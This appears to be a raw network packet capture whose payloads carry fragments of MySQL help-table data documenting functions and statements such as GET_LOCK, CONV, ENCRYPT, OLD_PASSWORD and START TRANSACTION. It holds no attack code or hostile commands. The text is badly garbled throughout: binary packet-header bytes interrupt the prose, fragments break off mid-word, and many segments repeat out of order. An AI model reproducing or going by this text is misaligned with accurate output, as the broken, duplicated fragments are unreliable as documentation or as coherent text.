bbBi0`ET@/p܂Ao0E<6@?  3P x<  )gange is -9223372036854775808 to\n9223372036854775807. The unsigned range is 0 to\n18446744073709551615.\n','',''),(95,'CHAR_LENGTH',23,' CHAR_LENGTH(str)\n\nReturns the length of the string str, measured in characters.\nA multi-byte character counts as a single character.\nThis means that for a string containing five two-byte characters,\nLENGTH() returns 10, whereas CHAR_LENGTH() returns\n5.\n','',''),(96,'SET',6,'SET sets different types of variables that affect the operation of the\nserver or your client. It can be used to assign values to user variables or\nsystem variables.\n','SET variable_assignment [, variable_assignment] ...\n\nvariable_assignment:\n user_var_name = expr\n | [GLOBAL | SESSION] system_var_name = expr\n | @@[global. | session.]system_var_name = expr',''),(97,'DATE',1,'A date. The supported range is \'1000-01-01\' to \'9999-12-31\'.\nMySQL displays DATE values in \'YYYY-MM-DD\' format, but\nallows you to assign values to DATE columns using either strings or\nnumbers.\n','',''),(98,'CONV',23,' CONV(N,from_base,to_base)\nConverts numbers between different number bases. Returns a string\nrepresentation of the number N, converted from base from_base\nto base to_base. Returns NULL if any argument is NULL.\nThe argument N is interpreCӭ bb0`BiET@/Ԁo0SE<6@@  3P x<  )gange is -9223372036854775808 to\n9223372036854775807. The unsigned range is 0 to\n18446744073709551615.\n','',''),(95,'CHAR_LENGTH',23,' CHAR_LENGTH(str)\n\nReturns the length of the string str, measured in characters.\nA multi-byte character counts as a single character.\nThis means that for a string containing five two-byte characters,\nLENGTH() returns 10, whereas CHAR_LENGTH() returns\n5.\n','',''),(96,'SET',6,'SET sets different types of variables that affect the operation of the\nserver or your client. It can be used to assign values to user variables or\nsystem variables.\n','SET variable_assignment [, variable_assignment] ...\n\nvariable_assignment:\n user_var_name = expr\n | [GLOBAL | SESSION] system_var_name = expr\n | @@[global. | session.]system_var_name = expr',''),(97,'DATE',1,'A date. The supported range is \'1000-01-01\' to \'9999-12-31\'.\nMySQL displays DATE values in \'YYYY-MM-DD\' format, but\nallows you to assign values to DATE columns using either strings or\nnumbers.\n','',''),(98,'CONV',23,' CONV(N,from_base,to_base)\nConverts numbers between different number bases. Returns a string\nrepresentation of the number N, converted from base from_base\nto base to_base. Returns NULL if any argument is NULL.\nThe argument N is interpreC bbBi0`ET@/˃2o0E<\@?"u  P֞%m>g  m|dnd net_write_timeout\non both your master and slave servers.\nSee also : [Server system variables].\n\nNote that LOAD DATA FROM MASTER does /not/ copy any\ntables from the mysql database. This makes it easy to have\ndifferent users and privileges on the master and the slave.\n\nThe LOAD DATA FROM MASTER statement\nrequires the replication account that is used to connect to the master\nto have the RELOAD and SUPER privileges on the master and the\nSELECT privilege for all master tables you want to load. All\nmaster tables for which the user does not have the SELECT privilege are\nignored by LOAD DATA FROM MASTER. This is because the\nmaster hides them from the user: LOAD DATA FROM MASTER calls\nSHOW DATABASES to know the master databases to load, but\nSHOW DATABASES returns only databases for which the user has\nsome privilege.\nSee [SHOW DATABASES, , SHOW DATABASES].\nOn the slave\'s side, the user that issues LOAD DATA FROM MASTER should\nhave grants to drop and create the databases and tables that are copied.\n','',''),(88,'RESET',6,'The RESET statement is used to clear the state of various server\noperations. It also acts as a stronger\nversion of the FLUSH statement. See also : [FLUSH, , FLUSH].\n','RESET reset_option [, reset_option] ...',''),(89,'GET_LOCK',21C ZZBi0`EL@/Ao0E4@?s  P?2.B# eWZC bb0`BiET@/o0AE<\@@!u  P֞%m>g  m|dnd net_write_timeout\non both your master and slave servers.\nSee also : [Server system variables].\n\nNote that LOAD DATA FROM MASTER does /not/ copy any\ntables from the mysql database. This makes it easy to have\ndifferent users and privileges on the master and the slave.\n\nThe LOAD DATA FROM MASTER statement\nrequires the replication account that is used to connect to the master\nto have the RELOAD and SUPER privileges on the master and the\nSELECT privilege for all master tables you want to load. All\nmaster tables for which the user does not have the SELECT privilege are\nignored by LOAD DATA FROM MASTER. This is because the\nmaster hides them from the user: LOAD DATA FROM MASTER calls\nSHOW DATABASES to know the master databases to load, but\nSHOW DATABASES returns only databases for which the user has\nsome privilege.\nSee [SHOW DATABASES, , SHOW DATABASES].\nOn the slave\'s side, the user that issues LOAD DATA FROM MASTER should\nhave grants to drop and create the databases and tables that are copied.\n','',''),(88,'RESET',6,'The RESET statement is used to clear the state of various server\noperations. It also acts as a stronger\nversion of the FLUSH statement. See also : [FLUSH, , FLUSH].\n','RESET reset_option [, reset_option] ...',''),(89,'GET_LOCK',21Cɱ ZZ0`BiEL@/!o0pE4@@r  P?2.B# eWZC bbBi0`ET@/˃2o0E<]@?"t  P֞%rFg t m}e,' GET_LOCK(str,timeout)\nTries to obtain a lock with a name given by the string str, with a\ntimeout of timeout seconds. Returns 1 if the lock was obtained\nsuccessfully, 0 if the attempt timed out (for example, because another\nclient has previously locked the name), or NULL if an error\noccurred (such as running out of memory or the thread was killed with\nmysqladmin kill). If you have a lock obtained with GET_LOCK(),\nit is released when you execute\nRELEASE_LOCK(), execute a new GET_LOCK(), or your connection\nterminates (either normally or abnormally).\n\nThis function can be used to implement application locks or to\nsimulate record locks. Names are locked on a server-wide basis.\nIf a name has been locked by one client, GET_LOCK() blocks\nany request by another client for a lock with the same name. This\nallows clients that agree on a given lock name to use the name to\nperform cooperative advisory locking.\n','mysql> SELECT GET_LOCK(\'lock1\',10);\n -> 1\nmysql> SELECT IS_FREE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT GET_LOCK(\'lock2\',10);\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock1\');\n -> NULL',''),(90,'UCASE',23,' UCASE(str)\n\nUCASE() is a synonym for UPPER().\n','',''C ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptje"lZ )vzC# bb0`BiET@/o0AE<]@@!t  P֞%rFg t m}e,' GET_LOCK(str,timeout)\nTries to obtain a lock with a name given by the string str, with a\ntimeout of timeout seconds. Returns 1 if the lock was obtained\nsuccessfully, 0 if the attempt timed out (for example, because another\nclient has previously locked the name), or NULL if an error\noccurred (such as running out of memory or the thread was killed with\nmysqladmin kill). If you have a lock obtained with GET_LOCK(),\nit is released when you execute\nRELEASE_LOCK(), execute a new GET_LOCK(), or your connection\nterminates (either normally or abnormally).\n\nThis function can be used to implement application locks or to\nsimulate record locks. Names are locked on a server-wide basis.\nIf a name has been locked by one client, GET_LOCK() blocks\nany request by another client for a lock with the same name. This\nallows clients that agree on a given lock name to use the name to\nperform cooperative advisory locking.\n','mysql> SELECT GET_LOCK(\'lock1\',10);\n -> 1\nmysql> SELECT IS_FREE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT GET_LOCK(\'lock2\',10);\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock1\');\n -> NULL',''),(90,'UCASE',23,' UCASE(str)\n\nUCASE() is a synonym for UPPER().\n','',''C. ZZ0`BiEL@/go0AE4T@@ 3 Ptje"lZ )vzC bbBi0`ET@/p܂Ao0E<6@?  3P   $)gted as an integer, but may be specified as\nan integer or a string. The minimum base is 2 and the maximum base is\n36. If to_base is a negative number, N is regarded as a\nsigned number. Otherwise, N is treated as unsigned. CONV() works\nwith 64-bit precision.\n','mysql> SELECT CONV(\'a\',16,2);\n -> \'1010\'\nmysql> SELECT CONV(\'6E\',18,8);\n -> \'172\'\nmysql> SELECT CONV(-17,10,-18);\n -> \'-H\'\nmysql> SELECT CONV(10+\'10\'+\'10\'+0xa,10,10);\n -> \'40\'',''),(99,'EXTRACT',14,' EXTRACT(type FROM date)\n\nThe EXTRACT() function uses the same kinds of interval type\nspecifiers as DATE_ADD() or DATE_SUB(), but extracts parts\nfrom the date rather than performing date arithmetic.\n','mysql> SELECT EXTRACT(YEAR FROM \'1999-07-02\');\n -> 1999\nmysql> SELECT EXTRACT(YEAR_MONTH FROM \'1999-07-02 01:02:03\');\n -> 199907\nmysql> SELECT EXTRACT(DAY_MINUTE FROM \'1999-07-02 01:02:03\');\n -> 20102\nmysql> SELECT EXTRACT(MICROSECOND\n -> FROM \'2003-01-02 10:30:00.00123\');\n -> 123',''),(100,'ENCRYPT',17,' ENCRYPT(str[,salt])\nEncrypt str using the Unix crypt() system call. The\nsalt argument should be a string with two characters.\n(As of MySQL 3.22.16, salt may be longer than two characters.)\C ZZBi0`EL@/Ao0E4@?s  P?23J&" eX[C bb0`BiET@/Ԁo0SE<6@@  3P   $)gted as an integer, but may be specified as\nan integer or a string. The minimum base is 2 and the maximum base is\n36. If to_base is a negative number, N is regarded as a\nsigned number. Otherwise, N is treated as unsigned. CONV() works\nwith 64-bit precision.\n','mysql> SELECT CONV(\'a\',16,2);\n -> \'1010\'\nmysql> SELECT CONV(\'6E\',18,8);\n -> \'172\'\nmysql> SELECT CONV(-17,10,-18);\n -> \'-H\'\nmysql> SELECT CONV(10+\'10\'+\'10\'+0xa,10,10);\n -> \'40\'',''),(99,'EXTRACT',14,' EXTRACT(type FROM date)\n\nThe EXTRACT() function uses the same kinds of interval type\nspecifiers as DATE_ADD() or DATE_SUB(), but extracts parts\nfrom the date rather than performing date arithmetic.\n','mysql> SELECT EXTRACT(YEAR FROM \'1999-07-02\');\n -> 1999\nmysql> SELECT EXTRACT(YEAR_MONTH FROM \'1999-07-02 01:02:03\');\n -> 199907\nmysql> SELECT EXTRACT(DAY_MINUTE FROM \'1999-07-02 01:02:03\');\n -> 20102\nmysql> SELECT EXTRACT(MICROSECOND\n -> FROM \'2003-01-02 10:30:00.00123\');\n -> 123',''),(100,'ENCRYPT',17,' ENCRYPT(str[,salt])\nEncrypt str using the Unix crypt() system call. The\nsalt argument should be a string with two characters.\n(As of MySQL 3.22.16, salt may be longer than two characters.)\C ZZ0`BiEL@/!o0pE4@@r  P?23J&" eX[C bbBi0`ET@/˃2o0E<^@?"s  P֞%wNg I3 m}e),(91,'MPOLYFROMWKB',13,' MPolyFromWKB(wkb[,srid])\n MultiPolygonFromWKB(wkb[,srid])\nConstructs a MULTIPOLYGON value using its WKB representation and SRID.\n','',''),(92,'DO',6,'DO executes the expressions but doesn\'t return any results. This is\nshorthand for SELECT expr, ..., but has the advantage that it\'s\nslightly faster when you don\'t care about the result.\n\nDO is useful mainly with functions that have side effects, such as\nRELEASE_LOCK().\n','DO expr [, expr] ...',''),(93,'CURTIME',14,' CURTIME()\n\nReturns the current time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT CURTIME();\n -> \'23:50:26\'\nmysql> SELECT CURTIME() + 0;\n -> 235026',''),(94,'BIGINT',1,' BIGINT[(M)] [UNSIGNED] [ZEROFILL]\nA large integer. The signed range is -9223372036854775808 to\n9223372036854775807. The unsigned range is 0 to\n18446744073709551615.\n','',''),(95,'CHAR_LENGTH',23,' CHAR_LENGTH(str)\n\nReturns the length of the string str, measured in characters.\nA multi-byte character counts as a single character.\nThis means that for a string containing five two-byte characters,\nLENGTH() returns 10, whereas CHAR_LENGTH() returns\n5.\n','',''),(96,'SET',6,'SET C ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptjo"lJ )vzC bb0`BiET@/o0AE<^@@!s  P֞%wNg I3 m}e),(91,'MPOLYFROMWKB',13,' MPolyFromWKB(wkb[,srid])\n MultiPolygonFromWKB(wkb[,srid])\nConstructs a MULTIPOLYGON value using its WKB representation and SRID.\n','',''),(92,'DO',6,'DO executes the expressions but doesn\'t return any results. This is\nshorthand for SELECT expr, ..., but has the advantage that it\'s\nslightly faster when you don\'t care about the result.\n\nDO is useful mainly with functions that have side effects, such as\nRELEASE_LOCK().\n','DO expr [, expr] ...',''),(93,'CURTIME',14,' CURTIME()\n\nReturns the current time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT CURTIME();\n -> \'23:50:26\'\nmysql> SELECT CURTIME() + 0;\n -> 235026',''),(94,'BIGINT',1,' BIGINT[(M)] [UNSIGNED] [ZEROFILL]\nA large integer. The signed range is -9223372036854775808 to\n9223372036854775807. The unsigned range is 0 to\n18446744073709551615.\n','',''),(95,'CHAR_LENGTH',23,' CHAR_LENGTH(str)\n\nReturns the length of the string str, measured in characters.\nA multi-byte character counts as a single character.\nThis means that for a string containing five two-byte characters,\nLENGTH() returns 10, whereas CHAR_LENGTH() returns\n5.\n','',''),(96,'SET',6,'SET C ZZ0`BiEL@/go0AE4T@@ 3 Ptjo"lJ )vzC bbBi0`ET@/أ  o0E<@?|  PPZ 脀 ! `dzr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','',''),(257,'AREA',0,' Area(poly)\nReturns as a double-precision number the area of the Polygon value\npoly, as measured in its spatial reference system.\n','mysql> SET @poly = \'Polygon((0 0,0 3,3 0,0 0),(1 1,1 2,2 1,1 1))\';\nmysql> SELECT Area(GeomFromText(@poly));\n+---------------------------+\n| Area(GeomFromText(@poly)) |\n+---------------------------+\n| 4 |\n+---------------------------+',''),(258,'START SLAVE',7,'START SLAVE [thread_type [, thread_type] ... ]\nSTART SLAVE [SQL_THREAD] UNTIL\n MASTER_LOG_FILE = \'log_name\', MASTER_LOG_POS = log_pos\nSTART SLAVE [SQL_THREAD] UNTIL\n RELAY_LOG_FILE = \'log_name\', RELAY_LOG_POS = log_pos\n\nthread_type: IO_THREAD | SQL_THREAD\n\nSTART SLAVE with no options starts both of the slave threads.\nThe I/O thread reads queries from the master server and stores them in the\nrelay log. The SQL thread reads the relay log and executes the\nqueries.\nSTART SLAVE requires the SUPER privilege.\n\nIf START SLAVE succeeds in starting the slave threads, it\nreturns without any error. However, even in that case, it might be that the slave\nthreads start and then later stop (for example, because they don\'t manage to\nconnect to tC bb0`BiET@/o0AE<@@{  PPZ 脀 ! `dzr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','',''),(257,'AREA',0,' Area(poly)\nReturns as a double-precision number the area of the Polygon value\npoly, as measured in its spatial reference system.\n','mysql> SET @poly = \'Polygon((0 0,0 3,3 0,0 0),(1 1,1 2,2 1,1 1))\';\nmysql> SELECT Area(GeomFromText(@poly));\n+---------------------------+\n| Area(GeomFromText(@poly)) |\n+---------------------------+\n| 4 |\n+---------------------------+',''),(258,'START SLAVE',7,'START SLAVE [thread_type [, thread_type] ... ]\nSTART SLAVE [SQL_THREAD] UNTIL\n MASTER_LOG_FILE = \'log_name\', MASTER_LOG_POS = log_pos\nSTART SLAVE [SQL_THREAD] UNTIL\n RELAY_LOG_FILE = \'log_name\', RELAY_LOG_POS = log_pos\n\nthread_type: IO_THREAD | SQL_THREAD\n\nSTART SLAVE with no options starts both of the slave threads.\nThe I/O thread reads queries from the master server and stores them in the\nrelay log. The SQL thread reads the relay log and executes the\nqueries.\nSTART SLAVE requires the SUPER privilege.\n\nIf START SLAVE succeeds in starting the slave threads, it\nreturns without any error. However, even in that case, it might be that the slave\nthreads start and then later stop (for example, because they don\'t manage to\nconnect to tCq bbBi0`ET@/p܂Ao0E<6@?  3P X  $)gnIf no salt argument is given, a random value is used.\n','mysql> SELECT ENCRYPT(\'hello\');\n -> \'VxuFAJXVARROc\'',''),(101,'OLD_PASSWORD',17,' OLD_PASSWORD(str)\n\nOLD_PASSWORD() is available as of MySQL 4.1, when the implementation of\nPASSWORD() was changed to improve security. OLD_PASSWORD()\nreturns the value of the pre-4.1 implementation of PASSWORD().\n[Password hashing].\n\n PASSWORD(str)\nCalculates and returns a password string from the plaintext password\nstr, or NULL if the argument was NULL. This is\nthe function that is used for encrypting MySQL passwords for storage\nin the Password column of the user grant table.\n','',''),(102,'FORMAT',21,' FORMAT(X,D)\nFormats the number X to a format like \'#,###,###.##\', rounded\nto D decimals, and returns the result as a string.\nIf D is 0, the result has no\ndecimal point or fractional part.\n','mysql> SELECT FORMAT(12332.123456, 4);\n -> \'12,332.1235\'\nmysql> SELECT FORMAT(12332.1,4);\n -> \'12,332.1000\'\nmysql> SELECT FORMAT(12332.2,0);\n -> \'12,332\'',''),(103,'||',20,' OR\n ||\nLogical OR.\nWhen both operands are non-NULL, the result is 1 if any\noperand is non-zero, and 0 otherwise. With a NULL operand,\nthe result is 1 if the other operand is non-zero, and NULL\C bb0`BiET@/Ԁo0SE<6@@  3P X  $)gnIf no salt argument is given, a random value is used.\n','mysql> SELECT ENCRYPT(\'hello\');\n -> \'VxuFAJXVARROc\'',''),(101,'OLD_PASSWORD',17,' OLD_PASSWORD(str)\n\nOLD_PASSWORD() is available as of MySQL 4.1, when the implementation of\nPASSWORD() was changed to improve security. OLD_PASSWORD()\nreturns the value of the pre-4.1 implementation of PASSWORD().\n[Password hashing].\n\n PASSWORD(str)\nCalculates and returns a password string from the plaintext password\nstr, or NULL if the argument was NULL. This is\nthe function that is used for encrypting MySQL passwords for storage\nin the Password column of the user grant table.\n','',''),(102,'FORMAT',21,' FORMAT(X,D)\nFormats the number X to a format like \'#,###,###.##\', rounded\nto D decimals, and returns the result as a string.\nIf D is 0, the result has no\ndecimal point or fractional part.\n','mysql> SELECT FORMAT(12332.123456, 4);\n -> \'12,332.1235\'\nmysql> SELECT FORMAT(12332.1,4);\n -> \'12,332.1000\'\nmysql> SELECT FORMAT(12332.2,0);\n -> \'12,332\'',''),(103,'||',20,' OR\n ||\nLogical OR.\nWhen both operands are non-NULL, the result is 1 if any\noperand is non-zero, and 0 otherwise. With a NULL operand,\nthe result is 1 if the other operand is non-zero, and NULL\C ʧBiE@@TBo0o0r%+=x: ;  5o( GzT^C2h<Vg$NS$$ҊPj՗rWSm>_X.Cmojn [H#0ƉmtVD65tڌCڽ BBBiʧE4l@@Sـo0ro0%:+=yG~V ( 5oCQ bbBi0`ET@/˃2o0E<_@?"r  P֞%|Vg  mesets different types of variables that affect the operation of the\nserver or your client. It can be used to assign values to user variables or\nsystem variables.\n','SET variable_assignment [, variable_assignment] ...\n\nvariable_assignment:\n user_var_name = expr\n | [GLOBAL | SESSION] system_var_name = expr\n | @@[global. | session.]system_var_name = expr',''),(97,'DATE',1,'A date. The supported range is \'1000-01-01\' to \'9999-12-31\'.\nMySQL displays DATE values in \'YYYY-MM-DD\' format, but\nallows you to assign values to DATE columns using either strings or\nnumbers.\n','',''),(98,'CONV',23,' CONV(N,from_base,to_base)\nConverts numbers between different number bases. Returns a string\nrepresentation of the number N, converted from base from_base\nto base to_base. Returns NULL if any argument is NULL.\nThe argument N is interpreted as an integer, but may be specified as\nan integer or a string. The minimum base is 2 and the maximum base is\n36. If to_base is a negative number, N is regarded as a\nsigned number. Otherwise, N is treated as unsigned. CONV() works\nwith 64-bit precision.\n','mysql> SELECT CONV(\'a\',16,2);\n -> \'1010\'\nmysql> SELECT CONV(\'6E\',18,8);\n -> \'172\'\nmysql> SELECT CONV(-17,10,-18);\n -> \'-HCe bb0`BiET@/o0AE<_@@!r  P֞%|Vg  mesets different types of variables that affect the operation of the\nserver or your client. It can be used to assign values to user variables or\nsystem variables.\n','SET variable_assignment [, variable_assignment] ...\n\nvariable_assignment:\n user_var_name = expr\n | [GLOBAL | SESSION] system_var_name = expr\n | @@[global. | session.]system_var_name = expr',''),(97,'DATE',1,'A date. The supported range is \'1000-01-01\' to \'9999-12-31\'.\nMySQL displays DATE values in \'YYYY-MM-DD\' format, but\nallows you to assign values to DATE columns using either strings or\nnumbers.\n','',''),(98,'CONV',23,' CONV(N,from_base,to_base)\nConverts numbers between different number bases. Returns a string\nrepresentation of the number N, converted from base from_base\nto base to_base. Returns NULL if any argument is NULL.\nThe argument N is interpreted as an integer, but may be specified as\nan integer or a string. The minimum base is 2 and the maximum base is\n36. If to_base is a negative number, N is regarded as a\nsigned number. Otherwise, N is treated as unsigned. CONV() works\nwith 64-bit precision.\n','mysql> SELECT CONV(\'a\',16,2);\n -> \'1010\'\nmysql> SELECT CONV(\'6E\',18,8);\n -> \'172\'\nmysql> SELECT CONV(-17,10,-18);\n -> \'-HC bbBi0`ET@/p܂Ao0E<6@?  3P e  &)hnotherwise. If both operands are NULL, the result is NULL.\n','mysql> SELECT 1 || 1;\n -> 1\nmysql> SELECT 1 || 0;\n -> 1\nmysql> SELECT 0 || 0;\n -> 0\nmysql> SELECT 0 || NULL;\n -> NULL\nmysql> SELECT 1 || NULL;\n -> 1',''),(104,'CASE',9,' CASE value WHEN [compare-value] THEN result [WHEN [compare-value] THEN result ...] [ELSE result] END\n CASE WHEN [condition] THEN result [WHEN [condition] THEN result ...] [ELSE result] END\n\nThe first version returns the result where\nvalue=compare-value. The second version returns the\nresult for the first condition that is true. If there was no matching result\nvalue, the result after ELSE is returned, or NULL if there is\nno ELSE part.\n','mysql> SELECT CASE 1 WHEN 1 THEN \'one\'\n -> WHEN 2 THEN \'two\' ELSE \'more\' END;\n -> \'one\'\nmysql> SELECT CASE WHEN 1>0 THEN \'true\' ELSE \'false\' END;\n -> \'true\'\nmysql> SELECT CASE BINARY \'B\'\n -> WHEN \'a\' THEN 1 WHEN \'b\' THEN 2 END;\n -> NULL',''),(105,'BIT_LENGTH',23,' BIT_LENGTH(str)\nReturns the length of the string str in bits.\n','mysql> SELECT BIT_LENGTH(\'text\');\n -> 32',''),(106,'EXTERIORRING',0,' ExteriorRing(poly)\nReturns the exterior ring of the Polygon value poly\nas a LC bb0`BiET@/Ԁo0SE<6@@  3P e  &)hnotherwise. If both operands are NULL, the result is NULL.\n','mysql> SELECT 1 || 1;\n -> 1\nmysql> SELECT 1 || 0;\n -> 1\nmysql> SELECT 0 || 0;\n -> 0\nmysql> SELECT 0 || NULL;\n -> NULL\nmysql> SELECT 1 || NULL;\n -> 1',''),(104,'CASE',9,' CASE value WHEN [compare-value] THEN result [WHEN [compare-value] THEN result ...] [ELSE result] END\n CASE WHEN [condition] THEN result [WHEN [condition] THEN result ...] [ELSE result] END\n\nThe first version returns the result where\nvalue=compare-value. The second version returns the\nresult for the first condition that is true. If there was no matching result\nvalue, the result after ELSE is returned, or NULL if there is\nno ELSE part.\n','mysql> SELECT CASE 1 WHEN 1 THEN \'one\'\n -> WHEN 2 THEN \'two\' ELSE \'more\' END;\n -> \'one\'\nmysql> SELECT CASE WHEN 1>0 THEN \'true\' ELSE \'false\' END;\n -> \'true\'\nmysql> SELECT CASE BINARY \'B\'\n -> WHEN \'a\' THEN 1 WHEN \'b\' THEN 2 END;\n -> NULL',''),(105,'BIT_LENGTH',23,' BIT_LENGTH(str)\nReturns the length of the string str in bits.\n','mysql> SELECT BIT_LENGTH(\'text\');\n -> 32',''),(106,'EXTERIORRING',0,' ExteriorRing(poly)\nReturns the exterior ring of the Polygon value poly\nas a LC bbBi0`ET@/˃2o0E<`@?"q  P֞%^g  me\'\nmysql> SELECT CONV(10+\'10\'+\'10\'+0xa,10,10);\n -> \'40\'',''),(99,'EXTRACT',14,' EXTRACT(type FROM date)\n\nThe EXTRACT() function uses the same kinds of interval type\nspecifiers as DATE_ADD() or DATE_SUB(), but extracts parts\nfrom the date rather than performing date arithmetic.\n','mysql> SELECT EXTRACT(YEAR FROM \'1999-07-02\');\n -> 1999\nmysql> SELECT EXTRACT(YEAR_MONTH FROM \'1999-07-02 01:02:03\');\n -> 199907\nmysql> SELECT EXTRACT(DAY_MINUTE FROM \'1999-07-02 01:02:03\');\n -> 20102\nmysql> SELECT EXTRACT(MICROSECOND\n -> FROM \'2003-01-02 10:30:00.00123\');\n -> 123',''),(100,'ENCRYPT',17,' ENCRYPT(str[,salt])\nEncrypt str using the Unix crypt() system call. The\nsalt argument should be a string with two characters.\n(As of MySQL 3.22.16, salt may be longer than two characters.)\nIf no salt argument is given, a random value is used.\n','mysql> SELECT ENCRYPT(\'hello\');\n -> \'VxuFAJXVARROc\'',''),(101,'OLD_PASSWORD',17,' OLD_PASSWORD(str)\n\nOLD_PASSWORD() is available as of MySQL 4.1, when the implementation of\nPASSWORD() was changed to improve security. OLD_PASSWORD()\nreturns the value of the pre-4.1 implementation of PASSWORD().\n[Password hashing].\n\n PASSWORD(str)\nCalculates C ffBi0`EX@/ЂSŀo0E@T@? 3 Ptjt"l )v| y|iC bb0`BiET@/o0AE<`@@!q  P֞%^g  me\'\nmysql> SELECT CONV(10+\'10\'+\'10\'+0xa,10,10);\n -> \'40\'',''),(99,'EXTRACT',14,' EXTRACT(type FROM date)\n\nThe EXTRACT() function uses the same kinds of interval type\nspecifiers as DATE_ADD() or DATE_SUB(), but extracts parts\nfrom the date rather than performing date arithmetic.\n','mysql> SELECT EXTRACT(YEAR FROM \'1999-07-02\');\n -> 1999\nmysql> SELECT EXTRACT(YEAR_MONTH FROM \'1999-07-02 01:02:03\');\n -> 199907\nmysql> SELECT EXTRACT(DAY_MINUTE FROM \'1999-07-02 01:02:03\');\n -> 20102\nmysql> SELECT EXTRACT(MICROSECOND\n -> FROM \'2003-01-02 10:30:00.00123\');\n -> 123',''),(100,'ENCRYPT',17,' ENCRYPT(str[,salt])\nEncrypt str using the Unix crypt() system call. The\nsalt argument should be a string with two characters.\n(As of MySQL 3.22.16, salt may be longer than two characters.)\nIf no salt argument is given, a random value is used.\n','mysql> SELECT ENCRYPT(\'hello\');\n -> \'VxuFAJXVARROc\'',''),(101,'OLD_PASSWORD',17,' OLD_PASSWORD(str)\n\nOLD_PASSWORD() is available as of MySQL 4.1, when the implementation of\nPASSWORD() was changed to improve security. OLD_PASSWORD()\nreturns the value of the pre-4.1 implementation of PASSWORD().\n[Password hashing].\n\n PASSWORD(str)\nCalculates C ff0`BiEX@/g؀o0AE@T@@ 3 Ptjt"l )v| y|iC, bbBi0`ET@/p܂Ao0E<6@?  3P *  &)hineString.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(ExteriorRing(GeomFromText(@poly)));\n+-------------------------------------------+\n| AsText(ExteriorRing(GeomFromText(@poly))) |\n+-------------------------------------------+\n| LINESTRING(0 0,0 3,3 3,3 0,0 0) |\n+-------------------------------------------+',''),(107,'GEOMFROMWKB',13,' GeomFromWKB(wkb[,srid])\n GeometryFromWKB(wkb[,srid])\nConstructs a geometry value of any type using its WKB representation and SRID.\n','',''),(108,'SHOW SLAVE HOSTS',6,'SHOW SLAVE HOSTS\n\nDisplays a list of slaves currently registered with the master.\nAny slave not started with the --report-host=slave_name\noption is not visible in that list.\n','',''),(109,'START TRANSACTION',10,'By default, MySQL runs with autocommit mode enabled. This means that\nas soon as you execute a statement that updates (modifies) a table,\nMySQL stores the update on disk.\n\nIf you are using transaction-safe tables (like InnoDB or BDB),\nyou can disable autocommit mode with the following statement:\n\nSET AUTOCOMMIT=0;\n\nAfter disabling autocommit mode by setting the AUTOCOMMIT variable to\nzero, you must use COMMIT to store your changes to disk or\nROLLBACK if you waC> bb0`BiET@/Ԁo0SE<6@@  3P *  &)hineString.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(ExteriorRing(GeomFromText(@poly)));\n+-------------------------------------------+\n| AsText(ExteriorRing(GeomFromText(@poly))) |\n+-------------------------------------------+\n| LINESTRING(0 0,0 3,3 3,3 0,0 0) |\n+-------------------------------------------+',''),(107,'GEOMFROMWKB',13,' GeomFromWKB(wkb[,srid])\n GeometryFromWKB(wkb[,srid])\nConstructs a geometry value of any type using its WKB representation and SRID.\n','',''),(108,'SHOW SLAVE HOSTS',6,'SHOW SLAVE HOSTS\n\nDisplays a list of slaves currently registered with the master.\nAny slave not started with the --report-host=slave_name\noption is not visible in that list.\n','',''),(109,'START TRANSACTION',10,'By default, MySQL runs with autocommit mode enabled. This means that\nas soon as you execute a statement that updates (modifies) a table,\nMySQL stores the update on disk.\n\nIf you are using transaction-safe tables (like InnoDB or BDB),\nyou can disable autocommit mode with the following statement:\n\nSET AUTOCOMMIT=0;\n\nAfter disabling autocommit mode by setting the AUTOCOMMIT variable to\nzero, you must use COMMIT to store your changes to disk or\nROLLBACK if you waC ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj|i"lމ )w|C ZZ0`BiEL@/go0AE4T@@ 3 Ptj|i"lމ )w|C bbBi0`ET@/p܂Ao0E<6@?  3Pß   *)int to ignore the changes you have made since\nthe beginning of your transaction.\n\nIf you want to disable autocommit mode for a single series of\nstatements, you can use the START TRANSACTION statement:\n','START TRANSACTION;\nSELECT @A:=SUM(salary) FROM table1 WHERE type=1;\nUPDATE table2 SET summary=@A WHERE type=1;\nCOMMIT;',''),(110,'BETWEEN AND',26,' expr BETWEEN min AND max\nIf expr is greater than or equal to min and expr is\nless than or equal to max, BETWEEN returns 1,\notherwise it returns 0. This is equivalent to the expression\n(min <= expr AND expr <= max) if all the arguments are of the\nsame type. Otherwise type conversion takes place according to the rules\ndescribed at the beginning of this section, but applied to all the three\narguments. Note: Before MySQL\n4.0.5, arguments were converted to the type of expr instead.\n','mysql> SELECT 1 BETWEEN 2 AND 3;\n -> 0\nmysql> SELECT \'b\' BETWEEN \'a\' AND \'c\';\n -> 1\nmysql> SELECT 2 BETWEEN 2 AND \'3\';\n -> 1\nmysql> SELECT 2 BETWEEN 2 AND \'x-3\';\n -> 0',''),(111,'MULTIPOLYGON',2,' MultiPolygon(poly1,poly2,...)\nConstructs a WKB MultiPolygon value from a set of WKB Polygon\narguments.\nIf any argument is not a WKB Polygon, the return value is NULL.\n','',''),(112,'TIC bb0`BiET@/Ԁo0SE<6@@  3Pß   *)int to ignore the changes you have made since\nthe beginning of your transaction.\n\nIf you want to disable autocommit mode for a single series of\nstatements, you can use the START TRANSACTION statement:\n','START TRANSACTION;\nSELECT @A:=SUM(salary) FROM table1 WHERE type=1;\nUPDATE table2 SET summary=@A WHERE type=1;\nCOMMIT;',''),(110,'BETWEEN AND',26,' expr BETWEEN min AND max\nIf expr is greater than or equal to min and expr 